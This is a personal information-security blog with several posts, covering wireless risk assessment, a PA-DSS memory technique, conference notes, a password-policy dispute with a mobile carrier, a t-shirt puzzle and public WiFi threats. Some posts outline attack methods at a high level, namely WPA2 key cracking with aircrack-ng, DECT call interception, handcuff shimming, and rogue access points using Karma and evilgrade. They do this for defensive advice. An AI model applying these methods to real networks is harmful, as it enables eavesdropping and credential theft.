The personal ramblings of an information security geek

FishermansEnemy - The personal ramblings of an information security geek

Watch out for wireless technologies

This is a cross post of a blog article I wrote at
Common risk assessment blind spots

Wireless technologies have become commonplace in the last few decades, everything with a battery seems to have an IP stack and an antenna. Ubiquitous connectivity allows us access to  the whole of human knowledge with a simple Google search. If an organisation didn’t provide the infrastructure to access the internet then they might be thought of as backwards and out of touch with modern business methods. There has been a lot written on the subject of WiFi security and many lessons have been learned since the good old days of WEP “encryption”, but there are still things organisations need to think about before deploying this kind of technology.

WPA2 is secure, right?

Yes, WPA2 is pretty secure and if someone is looking to have a play with your access points then seeing that in their favorite scanning tool will probably have them looking elsewhere. When I am tasked with assessing the security of a wireless installation then use of WPA2 is not in itself enough for me to give the thumbs up. You see, when WPA2 is used with a pre-shared key there is the possibility that whomever set it up did not create a complex enough key. It is a simple matter to observe the wireless network traffic until you see a device authenticating to the access point, once this happens and you observe the 4 way handshake you can feed this into a tool like aircrack-ng along with a word list. If the network admin picked a dictionary word, or a dictionary word with some “clever” character substitutions then you can usually recover the pre-shared key in a day or so. An attacker can boost their chances of obtaining the key by seeding the word list with words that are closely linked to the organisation they are attacking. They simply download the entire company website, pull out every unique word they find and add them to the usual word list.

As you can see from the above, it is imperative that the key you select be as random and as long as possible to help mitigate this kind of attack. The problem this gives you is the same as with any other password complexity requirement. The more secure it is, the more likely it is to be written down where someone who should not know it can find it. You also have the added headache of distributing the key to the legitimate users of the network.

What a lot of network administrators fail to think about is what happens when they key is compromised, for example if a wireless device is lost, stolen or breached by viruses or malware. Once your key is out of your control then you need to make sure that it is changed and a new key distributed to all of your users. In my experience this rarely happens, and it is usually a reason for abandoning the pre-shared key model and  looking at enterprise level controls using 802.1x.

It’s just a guest network

A lot of organisations have secure 802.1x wireless infrastructures for their staff to use for corporate LAN access but decide that it would be nice for visitors to be able to get internet access without having to provision certificates for them and allowing them access to the corporate LAN. This is very convenient for guests, but as we shall see there are a number of issues that need to be addressed before you roll something like this out.

Firstly, wireless does not respect the walls of your building the way that your wired infrastructure does. A 2.4GHz WiFi network can usually be observed from the car park of an office building as well as other floors of a building that may not be under your organisations control. When you implement your infrastructure take care with antenna type and placement to minimise the amount you radiate to the outside world by using directional antennas and turning down the transmission power on your access points. If a network is radiating too much power in the wrong direction then it is trivial to get access to it using a laptop’s built in network card, but someone who wanted to take advantage of your generous offer of free WiFi could do so from quite a considerable distance with something like an Alfa USB wireless card and a cheap directional antenna, which brings me onto my second point.

You are liable for what happens on your network

You may trust the people you work for and the guests you invite into your buildings, but if someone can access your network from outside of your organisations sphere of control then they have free internet access and you have no way to control them. If you implement guest WiFi access then make sure that you apply the same levels of content filtering and logging that you do on your wired network. If someone is intent on doing something illegal using your network then any investigation is going to end up on your doorstep. I don’t know a single company that would want to be in that position. Ultimately this needs to be taken on board as part of the standard risk assessment process, and the benefits of offering this service may not be worth the investment required to mitigate the threat of unauthorised or illegal use of the infrastructure.

It’s not just WiFi that radiates

The points that I have addressed above are the biggest blind spots that I have come across in my experience with corporate WiFi, but one that still catches a lot of organisations out is all of the other things they have that utilise radio. This kind of problem is one that the intelligence services have been aware of for quite some time, which is why you will never see a wireless keyboard and mouse in GCHQ. They have invested time and money into both protecting themselves and being able to intercept these kinds of signals from others. This kind of signals intelligence is known to the outside world under it’s codename ‘Tempest’ and has been actively researched since the mid 1980’s.

I would have a hard time justifying to a client that they should adopt ‘tempest’ levels of emission control as most of them simply are not under threat from actors who will use this level of sophistication, however I have seen wireless technology deployed within critical business functions where it simply was not needed.

An example of this would be in a service centre environment. The agents in the service centre were delivering first contact support to the entire organisation including authentication and access control services. They are desk bound, and in fact cannot do their job if they are away from their computer. These agents had recently had their phone system upgraded and had all been given very nice looking wireless headsets with which to take their calls. A brief look at these headsets revealed that the protocol they were using to communicate with their base stations was DECT, a standard that anyone with a wireless phone or baby monitor would be familiar with. DECT can employ encryption of the data stream, however since 2010 this has been rendered ineffective as the team at managed to reverse engineer the closed source security algorithm in place so that the encryption key could be recovered.

I mention the encryption here to ensure you understand that even with encryption in place the content of these conversations cannot be considered to be private, however in the case of the contact centre I was investigating the data sheets for the device proudly stated that encryption was not actually implemented. The data sheets were also very proud of the range of the devices, boasting a 50m range within a building and up to 200m outdoors using only the low power headset and base station. This particular contact centre was well within 200m of a public space with direct line of sight to the call handling agents through the buildings windows. A small investment in a Com-On-Air PCMCIA card and possibly a cheap directional antenna and someone could very easily listen in on or record every phone call taking place, a treasure trove of information for someone who wishes to do your organisation harm.

In this case I strongly advised that they cease using this technology and outlined the risks above, but I can’t really blame them for implementing it in the first place. It’s my job to think evil things about every piece of technology I come across, but the vast majority of people who are involved in procurement and risk assessment don’t make the connection between ‘wireless’ and ‘security’ unless they see the WiFi logo somewhere on the box.

It’s all about risk

Technical security has been talked about a lot with regards to wireless networking and wireless technologies but as I have demonstrated here there are still a few blind spots that organisations need to address when investigating any technology that comes with a radio in it. Utilise your organisations security staff as part of the risk assessment process and ensure that they are given the resources to keep their knowledge up to date. If you are implementing anything using wireless technologies and do not have the skills in house to assess the security implications then invest in some external consultancy. This could save you a lot of time and money compared to fixing an insecure implementation. This is a problem that is not going to get any easier to deal with as radio connectivity becomes more a part of every device we use.


I’ll preface this post with a warning that it is 99% technical content-free. If you want to follow me on a trip down memory lane to the early 90’s then grab your walkman, put on your shell suit and let’s do this!

Let’s have a drink

A friend who I used to work with at RWE decided to organise a night out for those of us who have recently left. It’s been 6 months since I left RWE after working there for 13 years and a lot of us who had been there for similar lengths of time have left over the last year or so. I hadn’t seen these guys since I left so I was looking forward to catching up with them and seeing how they’re doing, and commiserating with those that were still there and facing the axe.

A pint and three-quarters in and we were swapping war stories about life outside the old concrete monolith that we’d worked in for so long and talk soon turned to how we’d all ended up there.

I hadn’t realised when I got the invite, but one of the guys who came along I had known from my very first IT job back in 1994……

The college years

I was 17 and I had just left school the previous year. I was studying a BTEC in IT fundamentals and applications at Halesowen college, life was good and I still had hair. I hated school, I mean I really hated it and I was so glad to finally be out from that toxic atmosphere. I was finally studying what I was interested in with a bunch of nerds who were mostly on the same wavelength. The course was heavy on programming, maths and electronics and it was really fun to get my teeth into something so interesting. Part of the course required that we do 2 weeks of work experience with a real business, to help us prepare for the realities of work I guess.

At this point I had worked nights at a petrol station just to get some money to go out with. The fates had other ideas about that and the petrol station was soon shut down and I was out of work. I figured if I could find the right place to do my work experience I might be able to turn it into a 2 week interview and get another job out of it. A job that is actually in the field I was studying.

ICON computers

Just pretend it's full of computers and not beds.

Just pretend it’s full of computers and not beds.

The Dudley area wasn’t exactly silicon valley so the opportunities to work in IT for a 17-year-old at college weren’t exactly vast and many. My only realistic option was the large computer store that had recently opened over on the Merry Hill waterfront. I make a phone call and speak to the store manager Irfan and arrange to go in to speak to him. A short interview later and I’ve got my work experience placement.

ICON was my first proper IT job and I quickly fell into the technical support role. My mentor for those early years was a Andy Green, the technical manager, and I credit him for giving me the time, resources and knowledge that I needed to start on the path that I’m on today.

I clearly remember the first ever job I had to do at ICON. A customer had brought a new hard drive from us, a whopping 150mb monster, and he wanted us to fit it for him in his PC. I had *no* idea where to start. We didn’t have the internet back then so it was a case of reading the badly translated Japanese manual, grabbing a screwdriver and seeing what was what. After plugging in the IDE cable and power I switched the machine on and…. DISK NOT FOUND. Crap, not only wasn’t it seeing the new disk but it couldn’t see the old one either and the machine wouldn’t even boot. Andy sees what I’m doing and it’s obvious that he’s having fun watching me think I’ve destroyed the customers computer. He gives me a minute and then comes over and points to a pair of jumpers on the back of the drive labelled “Master” and “Slave”. The penny drops, I move the jumper on the new drive from “Master” to “Slave” and the machine boots first time. This was probably one of the best lessons I could have had, he let me have a go and only gave me just enough information so that I could figure it out for myself. I learned so much from the time I spent working for Andy and I’m sure that I wouldn’t be where I am today without the guidance he gave me in those early years.


Check out this 9600 baud bad boy

Soon after I started at ICON a friend of mine from college mentioned that he was also looking for a job. At the time the support department was just Andy working full-time and me working on the weekend. We were starting to get busier in the shop as the home computer market was starting to take off in a big way. Windows 95 was just around the corner and there had been a big marketing push by Microsoft. My friend came on board to join me at the weekend and we hired 2 full-time guys to work some of the week and the busy Saturdays. Mike was one of the full-time guys we brought on and it was him who started me on this 20 year trip down memory lane last night. I could fill a hundred blog posts about the kind of stuff we got up to in those 18 months we were there, but suffice to say we got to play with tons of cool stuff, such as the beast of an acoustic coupler pictured above which we used to reach BBS’s all over the place. We also set up a 10base2 Novel network in the store, and used it to play Doom. We got to see one of the first CD writers to come on the market and I ended up getting an Apple Newton!

Massive in-joke. Check the ceiling next time you're buying a bed

Massive in-joke. Check the ceiling next time you’re buying a bed

Sadly this wasn’t to last. Many smaller shops sprang up and a combination of our location and the size of the store soon made it impossible to compete. We all kept in touch after we went our separate ways and some of us even ended up working together again. I made some great friends in ’94 who I’m still in contact with today, we socialised together, chased girls in the local pubs and at least two of us met our partners thanks to the friendships we made.

So thank you Mike for reminding me about the journey I’ve been on. Thank you Irfan and Greg for giving me a chance. Thank you Andy for having the patience to train me, and making sure I had the tools I needed to continue to learn that I still use to this day. Thank you Neil for putting up with my constant attempts at comedy for the past 25 years. Thank you to all the people who have helped me as I moved from place to place and gave me opportunities to grow and develop. I hope that I’ve not let you down.

The Method of Loci

buckinghamIn my earlier post I mentioned that I was studying for my PA-DSS exam and that I was using a memory palace technique to commit the standard to memory prior to the exam. I’ll find out in a couple of weeks whether it actually helped as the exam didn’t actually ask a lot of questions that required rote memorisation of the standard.

UPDATE: I’ve just had the confirmation and I am now a PA-QSA. God have mercy etc.

I was asked by a friend about the kind of technique I actually used to build this, and I figured that it might be useful for other people as well so I felt a blog post was in order.

Wikipedia has a good write-up of the Method of Loci if you want to read all about the history and evolution of this type of memory mnemonic so I won’t waste your time copy/pasting it here. I am going to detail how I came across this technique and where I have used it to help memorise large quantities of usually dull and boring information.

You may have noticed I used “dull and boring” above and this is where a technique like the memory palace really comes into its own. I’m sure that if you are anything like me then remembering things that you find interesting isn’t usually a task at all, however if you have to keep 200+ security controls in mind when assessing a client then committing that kind of information to memory would seem like an impossible task.

800x442_kensington-palace-g5In essence what the memory palace gives you is the ability to use the areas of your brain that handle things like visual, auditory and olfactory stimulation and tie them together in order to apply them to abstract concepts like security controls to enhance the information available for your brain to index on. The method that I like to use I first came across reading Derren Browns Tricks of the Mind. This method uses a building that you are familiar with and takes you on a journey through it room by room. In each room you place items and people who you can connect with the item being memorised. This may be a number, playing card, security control or pretty much anything you like as long as the visual image is distinctive.

I find that they way that my mind works means that If I have a lot to remember I cannot fit it all in one building and have it stay “real” enough to my brain to be able to recall all the items at a later date. Because of this I have adapted the memory palace technique to use what has been called by others the journey method. This still has you placing people and items in locations but has the advantage of not being tied to a single building, but rather a series of connected locations that exist, at least for the most part, in reality. This is all very abstract so I feel an example is in order. If you are a masochist and you happen to be trying to memorise the PA-DSS V2.0 standard then please don’t use my example as a start, it won’t stick. Make sure you construct your own journey and it will pay off in the future.

PA-DSS V2.0 1.1.1

20130225_085118I’m standing on the corner of Powell and Market street in downtown San Francisco. I look up at the road sign above the intersection and notice that the roads are named “1st Street” and “Track Avenue”. In this area are a number of street vendors selling souvenirs and I walk over to the nearest one. He doesn’t seem particularly reputable. He is taking payment from a customer and I notice that he has taken the customer’s card and is swiping it though a mag stripe reader. “Do not store the full contents of any track from a card after authorisation”


PA-DSS V2.0 1.1.2

He turns the card over in his hand and I see that he is reading the CVV number from the signature strip and is writing that down in a notebook. “Do not store card CVV values after authorisation”

PA-DSS V2.0 1.1.3

He tells the customer that the mag stripe didn’t work and he needs to know their PIN. He also writes this down in the notebook. “Do not store PIN or PIN Block after authorisation”

PA-DSS V2.0 1.1.4

While this is going on 4 police officers approach the vendor from behind and walk over to a number of buckets sitting behind the vendor that I can see are full of the same types of notebook the vendor is using. They talk for a moment and then set fire to the notebooks. “Securely delete any mag stripe, CVV or PAN data stored by  previous versions of the software”

PA-DSS V2.0 1.1.5

The vendor is upset at the arson going on behind him. The police officers go to arrest him for his flagrant disregard for the law, however before they can a representative from the vendors payment handler approaches them and informs the police officers that he actually asked him to store this data to help solve a problem the vendor was having processing payments, and that he was going to make sure it was all disposed of once the problem had been solved. “Securely delete any sensitive authentication data used for debugging or troubleshooting”

Here you have my loci for PA-DSS V2.0 control 1. It works great for me as I can easily close my eyes and place myself in that exact location. The further I go into my journey the more personal to me it becomes so please don’t ask me about specific controls as even if I explained my loci it would make no sense to you at all. San Francisco was where I was doing the training for PA-QSA so it makes an obvious place to base my journey. I can remember the sounds and the smells (oh God, some of the smells) without any effort at all. I shall now forever associate the smell of Cannabis and despair with control 3. My hotel was in a very interesting neighborhood.

I hope this example of mine will help anyone else who is interested in trying something like this. If you have any questions then please leave a comment or hit me up on Twitter or G+ and I’ll do my best to answer them.

My experience of San Francisco and the BSides SF conference

San Francisco City Street

San Francisco City Street

I’m currently sat waiting to finish the PA-QSA course and take my exam. I should probably be studying a little more, but I’ve memorised the standard with a memory palace technique that I used for PCI-DSS so I recon I should be fine.

San Francisco is the first American city I’ve been in so the only comparisons I have are with large UK and european cities, but even so it seems to be very unique. It has the hustle and bustle that you’d expect from somewhere like London but everyone here seems to be a little more relaxed about life. The area around the Moscone center where RSA 2013 is being held is your typical conference district that you could find anywhere, but a few blocks walk from there you can find some of the worst poverty and homelessness that I have ever encountered. I’m not sure if it was because the RSA circus was in town but getting a hotel within a block or two of Moscone will cost you an arm and a leg. I managed to get a relatively cheap hotel only about 4 blocks from Union Square and Moscone, and even though the hotel itself is quite nice the streets around it are littered with people sleeping rough along with open drug use and people who are clearly in need of help with regards to their mental health. Those of you who know me might think I’m making a joke about this, I’m not. It’s something that as an outsider really makes you consider how something like this comes about and where the people of the city are putting their priorities when something like this is just accepted as being the way things are.

DNA Lounge ATM  machine

DNA Lounge ATM

Anyway, now I’ve bummed you all out I’ll move to the more exiting parts of my visit. I’m actually in town to do my PA-QSA certification however as the flights at a weekend are half the price of the same flight in the week I ended up with some time on my hands. I decided to sign up for BSides SF and I’m really glad I did. I’m not going to write a point by point review of the talks as I believe that 99% of them were recorded, so go online and watch them. One that I really did enjoy was on physical pen testing by Valerie Thomas. She gave a very interesting presentation on the vast amount of recon you can do with simple to use open source data sources, and the kind of stupid things you can do to bypass a variety of access control mechanisms.

After lunch on day 2 I decided to take a break from the main tracks and have a play in the locksport room. They had just run a competition where about 30 attendees got to try and escape from handcuffs live on stage with a bit of training given by the experts. Pretty much all the people who got up managed to get the cuffs off in under 10 seconds, so I thought to myself, I’m having some of that!

Ian in handcuffs

Ian in handcuffs

The locksport guys provided a range of picks and practice locks as well as a few examples of typical law enforcement style handcuffs. After a couple of minutes instruction I got myself cuffed up and managed to shim the cuffs and get them off in about 5 seconds. It was way easier than it should be, although as it was pointed out to me there are ways of cuffing the hands together to make it harder, but not impossible, to do this kind of escape.

A collection of locks and picks at BSides SF.

A collection of locks and picks at BSides SF.

After I’d perfected the shim technique they took us through how to pick the cuffs using a pick or bobby pin through the keyway. This also included picking cuffs that had been “double locked” so that the shimming technique would not work. Now, that is a lot harder than shimming but with an hour or so of practice I was getting pretty good at it. So, if anyone is stuck for a birthday present for me then a nice set of Law Enforcement grade cuffs would be grand :)

Now, if you’ve watched the Twitters then I’m sure you would have heard about the controversy surrounding @violetblue’s talk, and the fact that it was pulled at short notice. I’ll let Violet tell the story in her own words, as all I heard was a bit of conversation while I was being cuffed by Twitters head of security. If what Violet says is true then I have personally lost all respect in the ADA initiatives goals. Feel free to try to help people take part in the community, but do not try to censor hackers, we really don’t like it.

Alcatraz Island docks

Alcatraz Island docks

After all that excitement I decided to take a tourist day before I was locked in a room with a bunch of auditors for 2 days. I had a walk around the various Piers near Fisherman’s EnemyWharf and took a trip out to Alcatraz Island. I’m glad I did as the ranger guided tour along with the audio tour of the cell blocks was fascinating. If you want a breathtaking view of downtown San Francisco then there are very few to beat the one from the prison block on the top of Alcatraz.

Hunting Zebras (or how a toothbrush made me feel dumb)

Anyone who follows me to Twitter will probably remember that I’ve had some issues with my Samsung Galaxy S2 ever since I upgraded from 2.6  Froyo to 4.0.3 Ice Cream Sandwich. There are many posts in forums all about the battery and stability issues that have plagued this update and I have probably read all of them.

I also had some fun times with enabling encryption on the device due to it presenting a blank screen while it was performing the encryption rather that something that would let you know it was actually doing something.

With all the above issues I was hoping that the next update to arrive on my phone would solve all of my problems, so when Samsung made 4.0.4 available I installed it as soon as I could. Oh, and thanks Samsung for using OTA for the 4.0.4 update and not that piece of crapware you call Kies.

I bet you’re wondering where the African wildlife and dental hygiene products are? Don’t worry, they’re coming.

I ran 4.0.4 for a few days and was very happy that my battery was lasting longer, without the infamous “Android OS” usage that was killing it last time. The phone was more stable, in the sense that it actually kept running instead of overheating and crashing twice a day. I’m also sure that it made me more attractive to the opposite sex, everything is coming up Ian…

…Until I got a phone call. I don’t know if I’m typical of a smartphone user in that I use my phone for 90% data such as email, IM, social networking, 8% SMS and about 2% voice as I make and receive phone calls quite rarely. Recently I have used voice a lot more as I am in the process of changing jobs to a new employer. This call was from my new boss. He sounded like he was verrrry verrry far away. The volume was so quiet that I assumed he was either using a speaker phone or hiding under a bed because Liam Neeson was hunting him. I punched the volume up button but he was still almost inaudible. I managed to make it though the phone call, and I just assumed that his phone was at fault…

…Until I got another phone call from my Wife, she also sounded very far away. I know she never uses speaker phones and has done nothing to draw the eye of Liam Neeson so at that point I figured there was something wrong with my handset, and the only thing to chance recently was the OS.

I made a few calls to my network providers automated system and they were also quiet, so it is not just incoming calls that are a problem. Google is a wealth of information on this, apparently there were loads of problems like this on 2.6 and the solution was to enter a handset configuration mode and manually set the in call volume. I key in the special code and get to the configuration but the audio menu is blocked out so I can’t make any changes. At this point I’m getting annoyed, why can’t they test these updates before they send them out?

I start downloading apps that give access to “hidden” volume sliders, but all of them are set to maximum, I take a look at the internal logs and can’t spot anything that might be causing the problem. The only thing I haven’t done is a factory re-set. I hate doing these as it always takes me weeks to get my phone running just as I like it but at this point I need a phone that actually works as a phone. I bite the bullet and factory re-set the phone, selecting the option to back up all of my settings. 10 minutes later my phone is back to its ugly-ass default config, but at least all my settings have been preserved. I make a phone call to my network … and it’s really quiet again. Huh.

If you’re still reading, I promise the ambulatory barcode is coming up.

I figure that maybe, just maybe the backup process kept a setting that is causing my problem so I factory re-set the phone again without taking a backup of any settings. Once test phone call later and it is still quiet. F*cksocks.

At this point I am convinced that I’ve either got a hardware issue with my earphone speaker or the software update has swapped all of my other problems for this show stopper. I’m making a lot of calls because of my new job, I’ve got to Liverpool this week to do a talk and I’m going to need to be contactable, damn it I’m going to have to dig out my old Desire and send this one back to Samsung for repair. This is just what I need!

I Google a little more to see if anyone else has seen this problem with 4.0.4 in particular and one of the long forum threads with all the usual “Do the handset configuration mode fix…” “Re-set the phone, you’ve got bad settings from 4.0.3” “Download these apps… root your phone….” had this little gem buried in the middle:

“I had this problem as well. It turned out my speaker grill was dirty. I cleaned it and it was fine after that”

Well that’s just silly. This came on suddenly after my upgrade, it must be an issue with the software or a hardware failure. Still, doesn’t hurt to try right? I grab my toothbrush and give the grill a little clean. I make a test call to my network and once agai…. hang on a second, that’s loud again! I make another test call and it’s back to normal!

I had forgotten the lesson that I thought I had learned years ago, before you go hunting for that rare Zebra that is causing your problem make sure your issue isn’t with that simple looking horse that been standing there the whole time.

Hopefully the lesson has sunk in this time.

Bad password policies

Ever since I got my Yubikey I’ve been a big fan of making sure my many web application accounts are as secure as possible. Thanks to services like LastPass you can now keep up unique complex passwords on every account you own with very little extra effort.

So, in this spirit I decided to change my “My 3” account password at I fire up the random password generator and create a nice large random string. I take the string and feed it into their change password dialogue only to be told that only passwords less than 12 characters will be allowed. This backwards thinking is common is a lot of web applications, usually because of very bad design decisions made by the developer when it came to managing user authentication. A lot of times it is the indicator that passwords are stored without hashing.

On small web apps you should probably note this and make sure that you don’t use them if you value your security, however this app was one that I had to use and this password policy and it’s worrying implications were holding my mobile phone records so I was not going to let this go. I sent the following tweet to @threeuksupport yesterday:

#fail@ThreeUK@ThreeUKSupport “Your new password can not be greater than 12 characters in length”

Very soon they got back to me and a number of my followers that also happened to be customers saying that they would pass this to the security team and get a response back. This is actually pretty unusual for companies like this, as they mostly like brushing things like this under the carpet.

This morning the few of us that raised this got an email response from Three, Included below in the email they sent and my in-line reply.

On 21 June 2012 11:37, socialmediacare <> wrote:

Hi there,
Following the discussions on Twitter regarding My3 passwords, I’ve spoken with our security team and they’ve advised of the following:
– Passwords obviously need to be stored in a database.
No, passwords should *never* be stored. They should be salted with a unique value per user and hashed with a computationally expensive algorithm.
To prevent threats from things like SQL Injection, it is necessary to limit the password length so that Hackers cannot enter lengthy SQL statements (as passwords) to try and retrieve data from the database, corrupt it, or use Cross Site Scripting techniques by entering Javascript etc in input fields.
SQL Injection and XSS are defeated by proper input and output validation, not restricting the length of users passwords. This is a basic premise of securing web applications.
– Most people find passwords hard to remember. This is compounded when the password policy mandates that it must contain a combination of letters and numbers.
Does this mean that you *don’t* mandate alpha-numeric passwords?
To help ensure passwords are more memorable, and to reduce calls into the contact centre relating to forgotten passwords and locked accounts, the policy has been set such that a minimum of 7 & maximum of 12 characters is supported.
How does stopping a user from using a 13 character password prevent the user from forgetting it? At least you can admit that your goal with this policy is to reduce customer support calls. This is easily mitigated by having a robust automated password re-set mechanism as used on thousands of other web applications. Small sites like ebay and paypal.
Passwords longer than 12 characters are no more ‘secure’ but are significantly more likely to not be remembered or miss typed.
Forgotten an mis-typed yes, “less secure” You could not be more wrong. Please tell me how you arrived at the conclusion that passwords length does not impact on the security of the users account
Password security is largely a factor of the user’s choice of password. Something that is memorable to the user will always have the potential to be ‘guessed’ by another person through possible social engineering techniques etc.
If a password is longer than 12 characters, a user is more likely to have to write it down somewhere.
So you are arguing that a long password would be written down, therefore only exposed to a local physical security breach, so we’ll make sure they *can’t* have a long password and then they’ll only be exposed to every phishing site, keylogger and brute forcer on the planet? How does that make any sense? You position acknowledges that short memorable passwords are insecure (something you denied in a previous paragraph) yet you decide that the best position for you is to mandate them?
– It could be argued that 12 characters is a little restrictive. However, the reference to the recent Linked-in miss management of passwords, some might say is an irrelevance in relation to limiting the maximum password length to 12 characters. On this note, non of the passwords are stored in clear text form.
You need to look at the Linkedin breach and answer this again. At least Linkedin hashed their passwords, but without a salt and a CPU expensive algorithm the passwords were recovered for the vast majority within a few hours. First to fall were the dictionary words, so tell me again why you are limiting used to small passwords that are easy to remember?
While we obviously have a duty of care over customer data, but we also have to find the balance between protecting this data and usability.
You do have a duty of care over customer data, I’m glad that you realise that. With the recent exposure of phone infrastructure hacking from NI and other journalists I would have hoped that you realised that you hold the very private and personal data of a vast number of individuals who expect you to at least abide by industry best practice when it comes to securing access to it. If I were a high profile individual then this response from a national mobile infrastructure company then I would be very concerned about people who wish me harm gaining access to my call records.
Thanks for raising your concerns with us.
I look forward to seeing you’r acknowledgement of these issues and remidating them as soon as possible.
P.S I’ll be asking about your username policy next.

So there we have it. I’ll wait patiently for a reply from Three and let you know the outcome.


Here is the reply from Three UK

Hi Ian
I’ve raised your further email with our security team.  They’ve advised that they’re unable to enter into further discussion with you regarding our technical details on how wwe manage and store user credentials.
In doing so, would only be a security risk in itself.
Our website clearly states “Your password must be at least 7 characters long and must contain at least one number and one letter” and we do enforce these contraints.
Please take this as our final response on the matter.  I hope you understand the reasons why we’re unable to go in to any further security specifics with yourself.

So there we have it, I shouldn’t worry my pretty little head about it and we if we told you what we actually do to secure your data the entire planet would explode. Draw your own conclusions.

I guess I shouldn’t worry that they’ve got a new interface to My 3 in beta accessible to all users going on right now. I bet that thing is tight as drum.

Decoding the SANS Bsides london 2012 t shirt

Now that I’ve had a little while to recover from my tip to Atlantis … sorry, London last week I thought I’d turn my hand to something that’s been bothering me ever since I saw it.

Let me introduce the SANS variant of the offical bsides London t shirt.

The reverse of the SANS bsides London 2012 t shirt. Contains code

The back of the SANS bsides London 2012 t shirt

As you can see there is a nice block of code on the back. I assumed that this was some kind of well known infosec inside joke that I wasn’t familiar with. I put in on hoping that it didn’t say “Kick me” in unicode and proceeded to fill myself with Club Mate and awesome talks.

A few days pass and I catch sight of it again in the washing, so before tossing it in the washer I took a picture so I can take a closer look later.

What do we have here?

It looks like we have 2 different items here. The first block of what looks like it could be hex or hex encoded data and the last looks like some kind of script.

The first block

The first thing I noticed about the code is that it ends with either 3d3d or 3d3d3d if you allow it to wrap to the bottom like. So, what encoding scheme do we know that pads the end of a block with 2 characters? That’s right, base64. If you take 3d3d in hex and convert it to ASCII you get ==, the typical padding for base64.

Next, I took the string from the shirt and converted it from hex to ASCII


which converts to


I then took this base64 encoded string and decoded it using . This gave me an ASCII string.


Ahh, now we’re getting somewhere. We have a URL that has been reversed. It’s  short, and fairly obviously a url so I keyed it in by hand to my browser.

This leads us to another block of base64 encoded text.


Let’s put this through our decoder and see what we get. In this case it is a binary file of some sort. Because this is just a binary blob how do we know what to open it with? In this case I used the ‘files’ command on Linux which will look at a file and tell you what it is based on the ‘magic numbers’ or typical file headers to tell you what type of file it is. In this case it is

DecodedBase64 (1).bin: gzip compressed data, was "jlchal.txt", from Unix, last modified: Tue Apr 10 16:14:40 2012

I renamed the file and put it through gunzip and ended up with an ASCII text file.


In case that doesn’t render in your browser, here’s what it looks like.

God only knows

Who the hell is this guy

It’s at this point that I’ve hit a bit of a wall. I have no idea who this guy is, although he looks kind of like Art Garfunkel and now that’s all I can see when I look at it. The filename looks like it might be a clue, but again I do not recognise the name jlchal, or the initials JL if this is a challenge. It could refer to J.L Villar who has done some work in cryptography, however he does not look like this guy ;)

What do we have then?

I have drilled down the levels and ended up with an ASCII art picture of some guy I don’t recognise and a filename that may be a clue. If anyone has any suggestions then I’d love to hear them.

How about the last line?

The last line consists of

3d { print 0x$444 ); { iff beep }

I’m assuming the 3d belongs to this line, as if you add it to the block of text above it makes it invalid base64.

We have two executable blocks here, and this is where my lack of shell scripting is starting to be a problem. Print 0x should print a hex value, but the $ seems to indicate that it’s using an environment variable. The presence of the beep seems to indicate that it’s a bash environment but I cannot find the iff (if and only if) command anywhere inside bash.

So I didn’t get very far at all. Time for some more hacking to see if I can tease any more information out of it.


Twitter has informed me that JL is in fact @jameslyne, the creator of the challenge.


Why the London 2012 WiFi network will be a boon for information theives

I was reading twitter the other day and came across a report on London getting blanketed by free WiFi coverage courtesy of O2 and this got me thinking. If I were a bad guy this would present me with such a very tasty target. Lots of tourists coming into the city for the Olympics with all of their laptops, smart phones and tables. All of them not wanting to spend huge amounts on 3G roaming but thirsty for information and posting thousands of pics to Facebook and twitter. Of course they are going to take advantage of this free service, and so will the criminals.

In order to offer this service free of charge then security will always take a back seat. After all the information flowing over the network isn’t O2’s is it? They aren’t going to give each user a certificate to authenticate to the AP, and they aren’t going to configure everyone’s device to verify the cert on the AP. I mean who are we kidding, they aren’t even going to implement WEP let alone WPA2. At best it will be a captive portal so they can grab some nice info to sell on to their advertising buddies.

So now you are in London, you’ve taken some photos, waved at the Queen and taunted the guards outside Buckingham palace. You’re ready to drop it all of Facebook so you’re friends know just how much better you are than them. Time to connect to the free WiFi!

Open up your WiFi connection manager and there is “London Free WiFi from O2” [OPEN], sweet.

Select the AP and voilà, IP address obtained and I’m all ready to go.

Open up Internet Explorer and I get a nice O2 registration page where you can sign up for a free account or log on with an existing one. You put in your name, address, date of birth, mothers maiden name email address etc and are issued a default password. You don’t bother changing this, you just want to get on Facebook.

Log into Facebook and post pics. Look at your friends posts and comment “lol”. Isn’t living in the future cool?

The above sounds like a plausible use case for most people in the city and for most people they won’t see anything wrong with it. After all, they had to put in a password right, so it must be secure? Well, not so much. You see, while the tourist was sitting down with their latte to make their Facebook friends jealous, what actually was happening was this.

A criminal sets themselves up in a high traffic area of the city, probably near one of the sporting events. They fire up their laptop with an ALFA AWUS051NH wireless network adapter and 5dBi antenna.They will then fire up a copy of Karma. Now, Karma is a very generous piece of code. It will listen on the WiFi card and wait to hear other devices probing for access points. Usually when and AP receives a broadcast for an SSID that it doesn’t host it will simply ignore it, but Karma will answer all probes with a positive and allow the client to connect to it. Karma will then give the client and access point and begin to handle traffic. At this point Karma shows its generous nature again and will start answering requests for connections on a large number of protocols such as SMTP and FTP, it will use these connections to harvest the users credentials. If the criminal is being particularly evil they will be running Karmetasploit to automatically detect the software that you are using and start feeding them backdoors and exploits, joining you to their botnet and saving your machine to have more fun with later.

If the criminal is feeling generous he will connect himself to the legitimate WiFi and route your traffic onwards so you can actually surf, and he can steal even more credentials.

So how do you get around this? is there a way to use this service safely? If you want to give yourself a level of privacy while using a public network then your only real option is to connect via VPN to another trusted network and run all of your traffic through that. You are still exposed to having your credentials harvested between establishing connection to the network and establishing connection to the VPN, but if you are careful and make sure there are no apps that are going to attempt to connect as soon as they have a valid network then you should be OK. Also, make sure your anti-virus is up to date, but DO THAT AT HOME! you will see why in a bit.

If your smart phone supports VPN’s then it should be safe to use them as well, if not then either don’t use it, or use 3G. Check out openVPN to set up a service at your home that you can connect back to.

On the subject of software that will try to connect as soon as it gets a connection, it’s not just email apps that will do this. If you have Java, Acrobat, Flash or a host of other apps installed then they will attempt to connect back to their mothership and download updates. If our criminal is being very evil he will also be running evilgrade. Evilgrade is like Karma but for updates, it will intercept traffic and look for software calling home for updates. When it finds one it will intercept the connection and send the computer malware instead of the updates it was expecting. Welcome to the criminals botnet. The only defence is to make sure you are using a VPN but you will still be exposed to attack before you have established the connection or if it drops out for any reason. This article give some details on some third-party software you could use to help with this.

Everything that I have said above applies just the same to using any public network, but I contest that this combination of such a large public network with so many foreign tourists who will not want to use 3G due to costs makes this a golden opportunity for information thieves. So spread the word, make sure that your friends and family understand the risks, and as @j4vv4d would say, “Stay secure my friends”.